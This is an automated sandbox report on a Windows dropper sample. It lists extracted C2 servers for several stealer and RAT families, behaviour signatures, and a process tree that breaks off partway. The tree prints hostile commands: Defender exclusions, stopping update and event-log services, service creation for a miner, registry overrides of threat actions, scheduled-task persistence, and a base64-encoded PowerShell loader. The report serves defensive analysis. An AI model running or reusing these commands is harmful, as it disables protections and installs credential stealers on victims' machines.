Analysis

  • max time kernel
    81s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-05-2024 06:59

General

  • Target

    7ac40521a2a79b354db1edf99cc528b7db47161c30533bf421c709cd2c31cb14.exe

  • Size

    1.6MB

  • MD5

    312b71d8602f8422ba9eb3cb1895c084

  • SHA1

    0d19e38c4610f9857bba6ed95abc11b13b989099

  • SHA256

    7ac40521a2a79b354db1edf99cc528b7db47161c30533bf421c709cd2c31cb14

  • SHA512

    1504ddcebda7fd2fa43ec800f293048737dff836db77878bfd1ca2cd8cc72531d542a3234f0910de0cf188a0cf49f4606f9b2c734a6958c39247d6dbd73c1128

  • SSDEEP

    24576:24wCVF1fNGdMhKnb0u8fnQTacHoqCUI0CQGeKXNxO6vdDLhrgYq3TwSJbJnKuCXb:eyT40hQecIvwrl2CMdd6ZNnyXze/sku

Malware Config

Extracted

Family

amadey

Version

4.20

C2

http://5.42.96.141

http://5.42.96.7

Attributes
  • install_dir

    908f070dff

  • install_file

    explorku.exe

  • strings_key

    b25a9385246248a95c600f9a061438e1

  • url_paths

    /go34ko8/index.php

rc4.plain
rc4.plain

Extracted

Family

risepro

C2

147.45.47.126:58709

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

C2

185.172.128.33:8970

Extracted

Family

redline

Botnet

1

C2

185.215.113.67:26260

Extracted

Family

stealc

C2

http://49.13.229.86

Attributes
  • url_path

    /c73eed764cc59dcb.php

Extracted

Family

asyncrat

Version

| Controller

Botnet

Default

C2

45.138.16.138:4449

Mutex

mgyldyxvauzbuocyl

Attributes
  • delay

    1

  • install

    true

  • install_file

    windows.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

lumma

C2

https://zippyfinickysofwps.shop/api

https://acceptabledcooeprs.shop/api

https://obsceneclassyjuwks.shop/api

https://miniaturefinerninewjs.shop/api

https://plaintediousidowsko.shop/api

https://sweetsquarediaslw.shop/api

https://holicisticscrarws.shop/api

https://boredimperissvieos.shop/api

https://smallelementyjdui.shop/api

https://sofaprivateawarderysj.shop/api

https://lineagelasserytailsd.shop/api

https://tendencyportionjsuk.shop/api

https://headraisepresidensu.shop/api

https://appetitesallooonsj.shop/api

https://minorittyeffeoos.shop/api

https://prideconstituiiosjk.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detect ZGRat V1 3 IoCs
  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • Modifies firewall policy service 2 TTPs 1 IoCs
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 6 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Stealc

    Stealc is an infostealer written in C++.

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 3 IoCs
  • XMRig Miner payload 2 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Async RAT payload 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 13 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 57 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 37 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Windows security modification 2 TTPs 1 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 33 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 48 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 63 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7ac40521a2a79b354db1edf99cc528b7db47161c30533bf421c709cd2c31cb14.exe
    "C:\Users\Admin\AppData\Local\Temp\7ac40521a2a79b354db1edf99cc528b7db47161c30533bf421c709cd2c31cb14.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Checks whether UAC is enabled
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1248
    • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
      "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Adds Run key to start application
      • Checks whether UAC is enabled
      • Suspicious use of WriteProcessMemory
      PID:3720
      • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
        "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
        3⤵
          PID:4608
        • C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe
          "C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4596
          • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
            "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2680
            • C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
              "C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:4832
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                6⤵
                • Checks computer location settings
                • Suspicious use of WriteProcessMemory
                PID:2264
                • C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
                  "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4244
                • C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
                  "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
                  7⤵
                  • Executes dropped EXE
                  • Modifies system certificate store
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4860
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4832 -s 332
                6⤵
                • Program crash
                PID:4632
            • C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
              "C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:2496
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                6⤵
                  PID:3028
              • C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
                "C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4164
              • C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
                "C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
                5⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Suspicious use of WriteProcessMemory
                PID:4320
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:5096
                  • C:\Windows\SysWOW64\sc.exe
                    Sc stop GameServerClient
                    7⤵
                    • Launches sc.exe
                    PID:1140
                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                    GameService remove GameServerClient confirm
                    7⤵
                    • Executes dropped EXE
                    PID:672
                  • C:\Windows\SysWOW64\sc.exe
                    Sc delete GameSyncLink
                    7⤵
                    • Launches sc.exe
                    PID:208
                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                    GameService remove GameSyncLink confirm
                    7⤵
                    • Executes dropped EXE
                    PID:2704
                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                    GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:4252
                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                    GameService start GameSyncLink
                    7⤵
                    • Executes dropped EXE
                    PID:2172
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
                  6⤵
                    PID:1632
                    • C:\Windows\SysWOW64\sc.exe
                      Sc stop GameServerClientC
                      7⤵
                      • Launches sc.exe
                      PID:4948
                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                      GameService remove GameServerClientC confirm
                      7⤵
                      • Executes dropped EXE
                      PID:1824
                    • C:\Windows\SysWOW64\sc.exe
                      Sc delete PiercingNetLink
                      7⤵
                      • Launches sc.exe
                      PID:4732
                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                      GameService remove PiercingNetLink confirm
                      7⤵
                      • Executes dropped EXE
                      PID:1412
                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                      GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                      7⤵
                      • Executes dropped EXE
                      PID:1140
                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                      GameService start PiercingNetLink
                      7⤵
                      • Executes dropped EXE
                      PID:2628
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
                    6⤵
                      PID:4112
                      • C:\Windows\System32\Conhost.exe
                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        7⤵
                          PID:1412
                        • C:\Windows\SysWOW64\sc.exe
                          Sc delete GameSyncLinks
                          7⤵
                          • Launches sc.exe
                          PID:1160
                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                          GameService remove GameSyncLinks confirm
                          7⤵
                          • Executes dropped EXE
                          PID:4932
                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                          GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                          7⤵
                          • Executes dropped EXE
                          PID:2748
                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                          GameService start GameSyncLinks
                          7⤵
                          • Executes dropped EXE
                          PID:5112
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                        6⤵
                          PID:2672
                      • C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious use of WriteProcessMemory
                        PID:2228
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          6⤵
                            PID:4632
                        • C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
                          5⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:3400
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            6⤵
                              PID:2176
                          • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"
                            5⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            PID:2452
                            • C:\Windows\SysWOW64\schtasks.exe
                              "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F
                              6⤵
                              • Creates scheduled task(s)
                              PID:2672
                            • C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:4904
                            • C:\Users\Admin\AppData\Local\Temp\1000259001\toolspub1.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000259001\toolspub1.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:2908
                            • C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:5024
                            • C:\Users\Admin\AppData\Local\Temp\1000261001\FirstZ.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000261001\FirstZ.exe"
                              6⤵
                              • Executes dropped EXE
                              • Drops file in System32 directory
                              • Suspicious behavior: EnumeratesProcesses
                              PID:4840
                              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                7⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5288
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                7⤵
                                  PID:5948
                                  • C:\Windows\system32\wusa.exe
                                    wusa /uninstall /kb:890830 /quiet /norestart
                                    8⤵
                                      PID:6100
                                  • C:\Windows\system32\sc.exe
                                    C:\Windows\system32\sc.exe stop UsoSvc
                                    7⤵
                                    • Launches sc.exe
                                    PID:5956
                                  • C:\Windows\system32\sc.exe
                                    C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                    7⤵
                                    • Launches sc.exe
                                    PID:6036
                                  • C:\Windows\system32\sc.exe
                                    C:\Windows\system32\sc.exe stop wuauserv
                                    7⤵
                                    • Launches sc.exe
                                    PID:6124
                                  • C:\Windows\system32\sc.exe
                                    C:\Windows\system32\sc.exe stop bits
                                    7⤵
                                    • Launches sc.exe
                                    PID:2144
                                  • C:\Windows\system32\sc.exe
                                    C:\Windows\system32\sc.exe stop dosvc
                                    7⤵
                                    • Launches sc.exe
                                    PID:3188
                                  • C:\Windows\system32\powercfg.exe
                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                    7⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3460
                                  • C:\Windows\system32\powercfg.exe
                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                    7⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3156
                                  • C:\Windows\system32\powercfg.exe
                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                    7⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5224
                                  • C:\Windows\system32\powercfg.exe
                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                    7⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1080
                                  • C:\Windows\system32\sc.exe
                                    C:\Windows\system32\sc.exe delete "WSNKISKT"
                                    7⤵
                                    • Launches sc.exe
                                    PID:3492
                                  • C:\Windows\system32\sc.exe
                                    C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
                                    7⤵
                                    • Launches sc.exe
                                    PID:5720
                                  • C:\Windows\system32\sc.exe
                                    C:\Windows\system32\sc.exe stop eventlog
                                    7⤵
                                    • Launches sc.exe
                                    PID:5564
                                  • C:\Windows\system32\sc.exe
                                    C:\Windows\system32\sc.exe start "WSNKISKT"
                                    7⤵
                                    • Launches sc.exe
                                    PID:3240
                              • C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe
                                "C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"
                                5⤵
                                • Executes dropped EXE
                                PID:208
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkAFQAZQBtAHAARABpAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAKACQAUABhAHQAdABlAHIAbgAgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAEwAYQB0AGUAcwB0AEYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAVABlAG0AcABEAGkAcgAgAC0ARgBpAGwAdABlAHIAIAAkAFAAYQB0AHQAZQByAG4AIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIADjicZbIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAKWUGVMsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABFUz5EsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAHBlbmMKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAKBSxltoViAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJACgUsZbaFYuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJACgUsZbaFYuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkAOOJxltoViAAPQAgACQAoFLGW2hWLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQApZQZUywAIAAkABFUz5EpAAoAIAAgACAAIAAkAOOJxltwZW5jIAA9ACAAJADjicZbaFYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAHBlbmMsACAAMAAsACAAJABwZW5jLgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAOOJxltwZW5jCgB9AAoACgAkAKWUGVMgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA2AEMALAAgADAAeAAwADIALAAgADAAeABFADcALAAgADAAeAAxADAALAAgADAAeABDADcALAAgADAAeAA4ADgALAAgADAAeABEADEALAAgADAAeAAwAEUALAAgADAAeAA0AEIALAAgADAAeAA3ADkALAAgADAAeAA0ADQALAAgADAAeABGAEQALAAgADAAeABBADQALAAgADAAeABFADgALAAgADAAeAA2ADAALAAgADAAeABCADAALAAgADAAeAAwAEMALAAgADAAeAAzAEMALAAgADAAeABGADAALAAgADAAeAA3ADgALAAgADAAeAA2AEYALAAgADAAeAA2ADYALAAgADAAeAAzADIALAAgADAAeAAyADIALAAgADAAeABEADgALAAgADAAeABFADAALAAgADAAeABFAEEALAAgADAAeAAwADQALAAgADAAeAA2ADYALAAgADAAeAA0ADIALAAgADAAeABCAEMALAAgADAAeAA2ADgAKQAKACQAEVTPkSAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADkANAAsACAAMAB4ADkARAAsACAAMAB4ADgAMQAsACAAMAB4AEQARAAsACAAMAB4ADAAMgAsACAAMAB4ADkAMgAsACAAMAB4ADMAMQAsACAAMAB4ADgAQwAsACAAMAB4ADkANQAsACAAMAB4ADkARAAsACAAMAB4ADUANgAsACAAMAB4AEIAOAAsACAAMAB4AEUAMAAsACAAMAB4AEEAOAAsACAAMAB4ADkAMwAsACAAMAB4ADEANwApAAoACgBpAGYAIAAoACQATABhAHQAZQBzAHQARgBpAGwAZQAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAIdl9k7vjYRfIAA9ACAAJABMAGEAdABlAHMAdABGAGkAbABlAC4ARgB1AGwAbABOAGEAbQBlAAoAIAAgACAAIAAkAKBSxltXW4KCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAIdl9k7vjYRfKQA7AAoAIAAgACAAIAAkAOOJxluFUblbIAA9ACAA44nGWyAALQCllBlTIAAkAKWUGVMgAC0AEVTPkSAAJAARVM+RIAAtAHBlbmMgACQAoFLGW1dbgoIKAAoAIAAgACAAIAAkAAt6j17GliAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQA44nGW4VRuVspACkAOwAKACAAIAAgACAAJABlUeNTuXAgAD0AIAAkAAt6j17Gli4ARQBuAHQAcgB5AFAAbwBpAG4AdAA7AAoAIAAgACAAIAAkAGVR41O5cC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
                                  6⤵
                                  • UAC bypass
                                  • Windows security bypass
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious use of SetThreadContext
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1552
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe" -Force
                                    7⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3484
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                    7⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:220
                                    • C:\Users\Admin\Pictures\UVi6S35MiczjAiHJW7JVlBBu.exe
                                      "C:\Users\Admin\Pictures\UVi6S35MiczjAiHJW7JVlBBu.exe"
                                      8⤵
                                      • Executes dropped EXE
                                      PID:2084
                                    • C:\Users\Admin\Pictures\L86E1yzbFMaaCPiazvjJWWnw.exe
                                      "C:\Users\Admin\Pictures\L86E1yzbFMaaCPiazvjJWWnw.exe"
                                      8⤵
                                      • Executes dropped EXE
                                      PID:4416
                                    • C:\Users\Admin\Pictures\TCMlCTkgmnjFZ7B0fSAts8AG.exe
                                      "C:\Users\Admin\Pictures\TCMlCTkgmnjFZ7B0fSAts8AG.exe"
                                      8⤵
                                      • Executes dropped EXE
                                      PID:5056
                                    • C:\Users\Admin\Pictures\g8K9HIz27QrBEr9fSDiuepgZ.exe
                                      "C:\Users\Admin\Pictures\g8K9HIz27QrBEr9fSDiuepgZ.exe"
                                      8⤵
                                      • Executes dropped EXE
                                      PID:3204
                                    • C:\Users\Admin\Pictures\ypeCfR6J8VdYUdcbrbu3F9fT.exe
                                      "C:\Users\Admin\Pictures\ypeCfR6J8VdYUdcbrbu3F9fT.exe"
                                      8⤵
                                      • Executes dropped EXE
                                      PID:1064
                                    • C:\Users\Admin\Pictures\FjFKtd1VjKKjQElab1BkSC26.exe
                                      "C:\Users\Admin\Pictures\FjFKtd1VjKKjQElab1BkSC26.exe" /s
                                      8⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Writes to the Master Boot Record (MBR)
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2716
                                    • C:\Users\Admin\Pictures\vVRyTtPEBbWOcGZHpyut5X3D.exe
                                      "C:\Users\Admin\Pictures\vVRyTtPEBbWOcGZHpyut5X3D.exe"
                                      8⤵
                                      • Modifies firewall policy service
                                      • Windows security bypass
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Windows security modification
                                      • Checks whether UAC is enabled
                                      • Drops file in System32 directory
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:2748
                                    • C:\Users\Admin\Pictures\Ex0BqiLqq7Fe5mqOMvcklYM0.exe
                                      "C:\Users\Admin\Pictures\Ex0BqiLqq7Fe5mqOMvcklYM0.exe"
                                      8⤵
                                      • Executes dropped EXE
                                      PID:5500
                                      • C:\Users\Admin\AppData\Local\Temp\7zS46D8.tmp\Install.exe
                                        .\Install.exe /tEdidDDf "385118" /S
                                        9⤵
                                        • Checks BIOS information in registry
                                        • Checks computer location settings
                                        • Executes dropped EXE
                                        • Enumerates system info in registry
                                        PID:5552
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                          10⤵
                                            PID:5608
                                            • C:\Windows\SysWOW64\forfiles.exe
